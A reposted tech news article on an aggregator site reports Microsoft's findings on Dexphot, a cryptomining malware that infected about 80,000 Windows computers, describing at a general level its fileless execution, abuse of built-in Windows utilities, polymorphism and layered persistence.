Tuesday, April 13, 2021
  • Setup menu at Appearance » Menus and assign menu to Top Bar Navigation
Advertisement
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News
No Result
View All Result
NikolaNews
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News
No Result
View All Result
NikolaNews
No Result
View All Result
Home Internet Security

Microsoft says new Dexphot malware infected more than 80,000 computers

November 27, 2019
in Internet Security
This old trojan malware is back with a new trick to help it hide in plain sight
586
SHARES
3.3k
VIEWS
Share on FacebookShare on Twitter

Image: Microsoft

Microsoft security engineers detailed today a new malware strain that has been infecting Windows computers since October 2018 to hijack their resources to mine cryptocurrency and generate revenue for the attackers.

Named Dexphot, this malware reached its peak in mid-June this year, when its botnet reached almost 80,000 infected computers.

You might also like

Who do I pay to get the ‘phone’ removed from my iPhone?

Criminals spread malware using website contact forms with Google URLs

Critical security alert: If you haven’t patched this old VPN vulnerability, assume your network is compromised

Since then, the number of daily infections has been slowly going down, as Microsoft claims it deployed countermeasures to improve detections and stop attacks.

A complex malware strain for a mundane task

But while Doxphot’s end goal was banal, the methods and techniques for its modus operandi stood out due to their high level of complexity, something that Microsoft also noticed.

“Dexphot is not the type of attack that generates mainstream media attention,” said Hazel Kim, a malware analyst for the Microsoft Defender ATP Research Team, referring to the malware’s mundane task of mining cryptocurrency, rather than stealing user data.

“It’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles – to install a coin miner that silently steals computer resources and generates revenue for the attackers,” Kim said.

“Yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.”

In a report shared with ZDNet that’s scheduled to go live later today, Kim details Dexphot’s advanced techniques, such as the use of fileless execution, polymorphic techniques, and smart and redundant boot persistence mechanisms.

Infection process

According to Microsoft, Dexphot is what security researchers call a second-stage payload — a type of malware that’s dropped on systems that are already infected by other malware.

In this case, Dexphot was being dropped on computers that were previously infected with ICLoader, a malware strain that’s usually side-installed as part of software bundles, without the user’s knowledge, or when users downloaded and installed cracked or pirated software.

On some of these ICLoader-infected systems, the ICLoader gang would download and run the Dexphot installer.

Microsoft says this installer would be the only part of the Dexphot malware that would be written to disk, but only for a short period of time. Every other Dexphot file or operation would use a technique known as fileless execution to run inside the computer’s memory only, making the malware’s presence on a system invisible to classic signature-based antivirus solutions.

Furthermore, Dexphot would also employ a technique called “living off the land” (or LOLbins) to (ab)use legitimate Windows processes to execute malicious code, rather than run its own executables and processes.

For example, Microsoft says Dexphot would regularly abuse msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe, all legitimate apps that come pre-installed on Windows systems. By using these processes to start and run malicious code, Dexphot effectively became indistinguishable from other local apps that were allso using these Windows utilities to do their jobs.

dexphot-modus-operandi.png

Image: Microsoft

But Dexphot operators didn’t stop here. Because in recent years antivirus products have been using cloud-based systems to inventory and centralize patterns of malicious fileless execution and LOLbins abuse, Dexphot also employed a technique called polymorphism.

This technique refers to malware that constantly changes its artifacts. According to Microsoft, Dexphot operators changed the file names and URLs used in the infection process once every 20-30 minutes.

By the time an antivirus vendor would detect a pattern in Dexphot’s infection chain, that pattern would change, and allow the Dexphot gang to stay a step ahead of cyber-security products.

Multi-layered persistence mechanisms

But no malware stays undetected forever, and even in these cases, the Dexphot gang had planned ahead.

Microsoft says that Dexphot came with clever persistence mechanisms that would often re-infect systems that were not cleaned of all of the malware’s artifacts.

For the first, the malware used a technique called process hollowing to start two legitimate processes (svchost.exe and nslookup.exe), hollow their content, and run malicious code from within them.

Disguised as legitimate Windows processes, these two Dexphot components would keep an eye out that all the malware’s components were up and running, and reinstall the malware if one of them were stopped. Because there were two “monitoring” processes, even if system administrators or antivirus software removed one, the second would serve as a backup and re-infect the system later on.

Second, also working as a failsafe, Dexphot also used a series of scheduled tasks to make sure the victim is fileslessly reinfected after every reboot, or once every 90 or 110 minutes.

Because the tasks were scheduled to run at regular intervals, they also served as a way for the Dexphot gang to deliver updates to all infected systems.

According to Microsoft, every time one of these tasks ran, it downloaded a file from an attacker’s server, allowing the attacker to modify this file with updated instructions for all of the Dexphot infected hosts and update their entire botnet within hours after an antivirus vendor deployed any countermeasures.

Further, Microsoft says that polymorphism was also used for these tasks, with the Dexphot gang changing task names at regular intervals. This simple trick allowed the malware to skirt any blocklists that blocked scheduled tasks by their names.

As Microsoft’s Kim pointed out above, all of these techniques are terribly complicated. One would normally expect these types of redundancies to be found in the infection chains for malware developed by advanced government-backed hacking units.

However, in the last two years, these techniques have been slowly trickling down to cyber-criminal gangs, and are now pretty much a common occurrence in something as mundane as a crypto-currency mining operation like Dexphot, infostealers like Astaroth, or click-fraud operations like Nodersok.

Credit: Zdnet

Previous Post

Latest Kali Linux OS Added Windows-Style Undercover Theme for Hackers

Next Post

Transforming business intelligence, one insight at a timeDATAQUEST

Related Posts

Apple looking to close the gap between web and app privacy
Internet Security

Who do I pay to get the ‘phone’ removed from my iPhone?

April 13, 2021
Criminals spread malware using website contact forms with Google URLs
Internet Security

Criminals spread malware using website contact forms with Google URLs

April 13, 2021
Bug bounties: More hackers are spotting vulnerabilities across web, mobile and IoT
Internet Security

Critical security alert: If you haven’t patched this old VPN vulnerability, assume your network is compromised

April 13, 2021
Billions of smartphone owners will soon be authorising payments using facial recognition
Internet Security

Billions of smartphone owners will soon be authorising payments using facial recognition

April 13, 2021
PayPal rolls out new fraud management tools for merchants
Internet Security

PayPal rolls out new fraud management tools for merchants

April 12, 2021
Next Post
Transforming business intelligence, one insight at a timeDATAQUEST

Transforming business intelligence, one insight at a timeDATAQUEST

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended

Plasticity in Deep Learning: Dynamic Adaptations for AI Self-Driving Cars

Plasticity in Deep Learning: Dynamic Adaptations for AI Self-Driving Cars

January 6, 2019
Microsoft, Google Use Artificial Intelligence to Fight Hackers

Microsoft, Google Use Artificial Intelligence to Fight Hackers

January 6, 2019

Categories

  • Artificial Intelligence
  • Big Data
  • Blockchain
  • Crypto News
  • Data Science
  • Digital Marketing
  • Internet Privacy
  • Internet Security
  • Learn to Code
  • Machine Learning
  • Marketing Technology
  • Neural Networks
  • Technology Companies

Don't miss it

Apple looking to close the gap between web and app privacy
Internet Security

Who do I pay to get the ‘phone’ removed from my iPhone?

April 13, 2021
Robust Artificial Intelligence of Document Attestation to Ensure Identity Theft
Data Science

Robust Artificial Intelligence of Document Attestation to Ensure Identity Theft

April 13, 2021
Data Science And Machine Learning Service Market Growth Due to COVID-19 Spread | ZS, LatentView Analytics, Mango Solutions, Microsoft, International Business Machine – KSU
Machine Learning

Data Science And Machine Learning Service Market Growth Due to COVID-19 Spread | ZS, LatentView Analytics, Mango Solutions, Microsoft, International Business Machine – KSU

April 13, 2021
How to Change the WordPress Admin Login Logo
Learn to Code

Intl.NumberFormat

April 13, 2021
Criminals spread malware using website contact forms with Google URLs
Internet Security

Criminals spread malware using website contact forms with Google URLs

April 13, 2021
Trends in custom software development in 2021
Data Science

Trends in custom software development in 2021

April 13, 2021
NikolaNews

NikolaNews.com is an online News Portal which aims to share news about blockchain, AI, Big Data, and Data Privacy and more!

What’s New Here?

  • Who do I pay to get the ‘phone’ removed from my iPhone? April 13, 2021
  • Robust Artificial Intelligence of Document Attestation to Ensure Identity Theft April 13, 2021
  • Data Science And Machine Learning Service Market Growth Due to COVID-19 Spread | ZS, LatentView Analytics, Mango Solutions, Microsoft, International Business Machine – KSU April 13, 2021
  • Intl.NumberFormat April 13, 2021

Subscribe to get more!

© 2019 NikolaNews.com - Global Tech Updates

No Result
View All Result
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News

© 2019 NikolaNews.com - Global Tech Updates